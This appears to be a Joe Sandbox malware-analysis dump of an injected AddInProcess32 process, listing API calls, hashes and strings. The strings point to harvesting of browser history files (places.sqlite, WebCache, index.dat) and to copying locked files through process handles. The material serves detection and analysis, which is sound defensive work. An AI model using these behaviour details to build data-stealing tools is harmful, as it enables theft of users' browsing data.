                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 2911713577-0
                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                      APIs
                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcmp
                                                      • String ID: @ $SQLite format 3
                                                      • API String ID: 1475443563-3708268960
                                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                      APIs
                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                      • memset.MSVCRT ref: 00414C87
                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressCloseProcVersionmemsetwcscpy
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                      • API String ID: 2705122986-2036018995
                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpqsort
                                                      • String ID: /nosort$/sort
                                                      • API String ID: 1579243037-1578091866
                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                      APIs
                                                      • memset.MSVCRT ref: 0040E60F
                                                      • memset.MSVCRT ref: 0040E629
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      Strings
                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                      • API String ID: 3354267031-2114579845
                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                      APIs
                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 3473537107-0
                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                      APIs
                                                      Strings
                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                      • API String ID: 2221118986-1725073988
                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??3@DeleteObject
                                                      • String ID: r!A
                                                      • API String ID: 1103273653-628097481
                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID:
                                                      • API String ID: 1033339047-0
                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                      APIs
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$memcmp
                                                      • String ID: $$8
                                                      • API String ID: 2808797137-435121686
                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                      Strings
                                                      • duplicate column name: %s, xrefs: 004307FE
                                                      • too many columns on %s, xrefs: 00430763
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                      • API String ID: 0-1445880494
                                                      • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                      • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                      APIs
                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                      • String ID:
                                                      • API String ID: 1979745280-0
                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                      APIs
                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                      • memset.MSVCRT ref: 00403A55
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                      • String ID: history.dat$places.sqlite
                                                      • API String ID: 2641622041-467022611
                                                      • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                      • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                      APIs
                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                      • GetLastError.KERNEL32 ref: 00417627
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$File$PointerRead
                                                      • String ID:
                                                      • API String ID: 839530781-0
                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID: *.*$index.dat
                                                      • API String ID: 1974802433-2863569691
                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FilePointer
                                                      • String ID:
                                                      • API String ID: 1156039329-0
                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                      • String ID:
                                                      • API String ID: 1125800050-0
                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                      APIs
                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleSleep
                                                      • String ID: }A
                                                      • API String ID: 252777609-2138825249
                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                      APIs
                                                      • malloc.MSVCRT ref: 00409A10
                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                      • free.MSVCRT ref: 00409A31
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: freemallocmemcpy
                                                      • String ID:
                                                      • API String ID: 3056473165-0
                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                      APIs
                                                      Strings
                                                      • failed memory resize %u to %u bytes, xrefs: 00415358
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: realloc
                                                      • String ID: failed memory resize %u to %u bytes
                                                      • API String ID: 471065373-2134078882
                                                      • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                      • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                      • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                      • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: BINARY
                                                      • API String ID: 2221118986-907554435
                                                      • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
